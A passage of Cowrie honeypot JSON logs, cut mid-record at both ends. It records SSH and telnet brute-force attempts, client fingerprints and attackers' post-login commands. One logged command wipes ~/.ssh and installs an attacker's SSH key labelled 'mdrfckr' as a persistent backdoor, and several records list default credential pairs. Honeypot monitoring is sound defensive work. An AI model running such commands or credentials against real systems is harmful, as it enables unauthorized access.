-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:27:22.863543Z","src_ip":"212.227.235.229","session":"c4d5dfd60dd5"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:27:23.630860Z","src_ip":"212.227.235.229","session":"c4d5dfd60dd5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:27:24.238092Z","src_ip":"212.227.235.229","session":"c4d5dfd60dd5"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:27:24.238939Z","src_ip":"212.227.235.229","session":"c4d5dfd60dd5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:27:24.495116Z","src_ip":"212.227.235.229","session":"c4d5dfd60dd5"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:27:24.496160Z","src_ip":"212.227.235.229","session":"c4d5dfd60dd5"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":54960,"dst_ip":"1.2.3.4","dst_port":23,"session":"a69286c1a098","protocol":"telnet","message":"New connection: 8.222.212.69:54960 (1.2.3.4:23) [session: a69286c1a098]","sensor":"my-vps","timestamp":"2025-08-28T06:27:31.309316Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56148,"dst_ip":"1.2.3.4","dst_port":22,"session":"790b76e5d6ac","protocol":"ssh","message":"New connection: 212.227.125.160:56148 (1.2.3.4:22) [session: 790b76e5d6ac]","sensor":"my-vps","timestamp":"2025-08-28T06:27:32.528761Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:27:32.530367Z","src_ip":"212.227.125.160","session":"790b76e5d6ac"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:27:32.747757Z","src_ip":"212.227.125.160","session":"790b76e5d6ac"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"nginx123","message":"login attempt [nginx/nginx123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:27:33.621674Z","src_ip":"212.227.125.160","session":"790b76e5d6ac"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:27:34.841098Z","src_ip":"212.227.125.160","session":"790b76e5d6ac"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32922,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f2fd2b45346","protocol":"ssh","message":"New connection: 212.227.235.229:32922 (1.2.3.4:22) [session: 0f2fd2b45346]","sensor":"my-vps","timestamp":"2025-08-28T06:27:39.199136Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:27:39.199821Z","src_ip":"212.227.235.229","session":"0f2fd2b45346"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:27:39.450227Z","src_ip":"212.227.235.229","session":"0f2fd2b45346"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"nginx123","message":"login attempt [nginx/nginx123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:27:40.203652Z","src_ip":"212.227.235.229","session":"0f2fd2b45346"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:27:41.456539Z","src_ip":"212.227.235.229","session":"0f2fd2b45346"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50078,"dst_ip":"1.2.3.4","dst_port":22,"session":"79bdfc05509b","protocol":"ssh","message":"New connection: 212.227.235.229:50078 (1.2.3.4:22) [session: 79bdfc05509b]","sensor":"my-vps","timestamp":"2025-08-28T06:27:44.513408Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T06:27:44.514258Z","src_ip":"212.227.235.229","session":"79bdfc05509b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T06:27:45.158326Z","src_ip":"212.227.235.229","session":"79bdfc05509b"}
{"eventid":"cowrie.login.success","username":"root","password":"Sushil@123","message":"login attempt [root/Sushil@123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:27:45.881761Z","src_ip":"212.227.235.229","session":"79bdfc05509b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:27:46.496321Z","src_ip":"212.227.235.229","session":"79bdfc05509b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T06:27:46.497113Z","src_ip":"212.227.235.229","session":"79bdfc05509b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T06:27:46.498262Z","src_ip":"212.227.235.229","session":"79bdfc05509b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:27:46.574569Z","src_ip":"212.227.235.229","session":"79bdfc05509b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:27:47.255654Z","src_ip":"212.227.235.229","session":"79bdfc05509b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T06:27:47.256430Z","src_ip":"212.227.235.229","session":"79bdfc05509b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T06:27:47.760199Z","src_ip":"212.227.235.229","session":"79bdfc05509b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:27:47.761167Z","src_ip":"212.227.235.229","session":"79bdfc05509b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50088,"dst_ip":"1.2.3.4","dst_port":22,"session":"e5ec728b7226","protocol":"ssh","message":"New connection: 212.227.235.229:50088 (1.2.3.4:22) [session: e5ec728b7226]","sensor":"my-vps","timestamp":"2025-08-28T06:27:47.836246Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T06:27:47.836859Z","src_ip":"212.227.235.229","session":"e5ec728b7226"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T06:27:47.911229Z","src_ip":"212.227.235.229","session":"e5ec728b7226"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":32838,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c7e1243b359","protocol":"ssh","message":"New connection: 212.227.125.160:32838 (1.2.3.4:22) [session: 6c7e1243b359]","sensor":"my-vps","timestamp":"2025-08-28T06:27:49.024364Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:27:49.025370Z","src_ip":"212.227.125.160","session":"6c7e1243b359"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T06:27:49.041839Z","src_ip":"212.227.235.229","session":"e5ec728b7226"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:27:49.250474Z","src_ip":"212.227.125.160","session":"6c7e1243b359"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"123456","message":"login attempt [esuser/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:27:49.912656Z","src_ip":"212.227.125.160","session":"6c7e1243b359"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:27:50.318810Z","src_ip":"212.227.235.229","session":"e5ec728b7226"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50100,"dst_ip":"1.2.3.4","dst_port":22,"session":"cd0449af001c","protocol":"ssh","message":"New connection: 212.227.235.229:50100 (1.2.3.4:22) [session: cd0449af001c]","sensor":"my-vps","timestamp":"2025-08-28T06:27:50.389556Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T06:27:50.390583Z","src_ip":"212.227.235.229","session":"cd0449af001c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T06:27:50.463296Z","src_ip":"212.227.235.229","session":"cd0449af001c"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:27:51.133686Z","src_ip":"212.227.125.160","session":"6c7e1243b359"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:27:51.642218Z","src_ip":"212.227.235.229","session":"cd0449af001c"}
{"eventid":"cowrie.session.closed","duration":"7.2","message":"Connection lost after 7.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:27:51.715540Z","src_ip":"212.227.235.229","session":"79bdfc05509b"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:27:51.716858Z","src_ip":"212.227.235.229","session":"cd0449af001c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47984,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef2df58dc1ba","protocol":"ssh","message":"New connection: 212.227.235.229:47984 (1.2.3.4:22) [session: ef2df58dc1ba]","sensor":"my-vps","timestamp":"2025-08-28T06:27:55.379636Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:27:55.380821Z","src_ip":"212.227.235.229","session":"ef2df58dc1ba"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:27:55.661476Z","src_ip":"212.227.235.229","session":"ef2df58dc1ba"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"123456","message":"login attempt [esuser/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:27:57.137748Z","src_ip":"212.227.235.229","session":"ef2df58dc1ba"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:27:58.392528Z","src_ip":"212.227.235.229","session":"ef2df58dc1ba"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":59464,"dst_ip":"1.2.3.4","dst_port":23,"session":"f5ab5764a411","protocol":"telnet","message":"New connection: 8.222.212.69:59464 (1.2.3.4:23) [session: f5ab5764a411]","sensor":"my-vps","timestamp":"2025-08-28T06:27:59.602840Z"}
{"eventid":"cowrie.session.closed","duration":30.849251985549927,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:28:02.158478Z","src_ip":"8.222.212.69","session":"a69286c1a098"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":59286,"dst_ip":"1.2.3.4","dst_port":23,"session":"adeeff684f17","protocol":"telnet","message":"New connection: 8.222.212.69:59286 (1.2.3.4:23) [session: adeeff684f17]","sensor":"my-vps","timestamp":"2025-08-28T06:28:04.296476Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35218,"dst_ip":"1.2.3.4","dst_port":22,"session":"3fb70244e386","protocol":"ssh","message":"New connection: 212.227.125.160:35218 (1.2.3.4:22) [session: 3fb70244e386]","sensor":"my-vps","timestamp":"2025-08-28T06:28:05.230422Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:28:05.231225Z","src_ip":"212.227.125.160","session":"3fb70244e386"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","s